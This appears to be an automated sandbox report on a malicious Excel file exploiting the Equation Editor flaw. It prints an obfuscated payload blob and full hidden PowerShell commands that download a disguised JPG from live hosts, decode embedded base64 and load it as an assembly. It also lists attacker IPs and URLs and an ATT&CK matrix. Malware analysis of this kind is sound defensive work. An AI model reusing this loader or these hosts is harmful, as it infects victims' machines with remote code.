kDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredgdgtrelwdgtre5dgtredkdgtrendgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtredcdgtrengdgtre5dgtredkdgtremdgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreag
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.oel/oel/69.442.29.19//:ptth' , '1' , 'c:\programdata\' , 'leo','regasm',''))} }
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredgdgtrelwdgtre5dgtredkdgtrendgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtredcdgtrengdgtre5dgtredkdgtremdgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreag	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.oel/oel/69.442.29.19//:ptth' , '1' , 'c:\programdata\' , 'leo','regasm',''))} }	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	111 Command and Scripting Interpreter	221 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Modify Registry	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	23 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Rundll32	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
P018400.xla.xlsx	16%	ReversingLabs
P018400.xla.xlsx	23%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A088A985-E6D5-4349-B475-13037637E9EB}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc	100%	Avira	HEUR/Rtf.Malformed

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
uploaddeimagens.com.br	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://91.92.244.96/LEO/Leoloverme.vbsm	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/Leoloverme.vbsooC:	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://91.92.244.96/LEO/Leoloverme.vbs	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/Leoloverme.vbsj	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907	4%	Virustotal		Browse
https://www.google.com;	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdatio	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLOC:	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO/microballonu	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLOME=user-PCComSpec=C:	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO/	0%	Avira URL Cloud	safe
http://tempuri.org/BD_AUTOMCAODataSet1.xsd	0%	Avira URL Cloud	safe
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	13%	Virustotal		Browse
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	100%	Avira URL Cloud	malware
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO3	0%	Avira URL Cloud	safe
http://91.92.244.96/LEO/CLO4	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_u	0%	Avira URL Cloud	safe
http://tempuri.org/BD_AUTOMCAODataSet1.xsd	0%	Virustotal		Browse
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	104.21.84.67	true	false		high
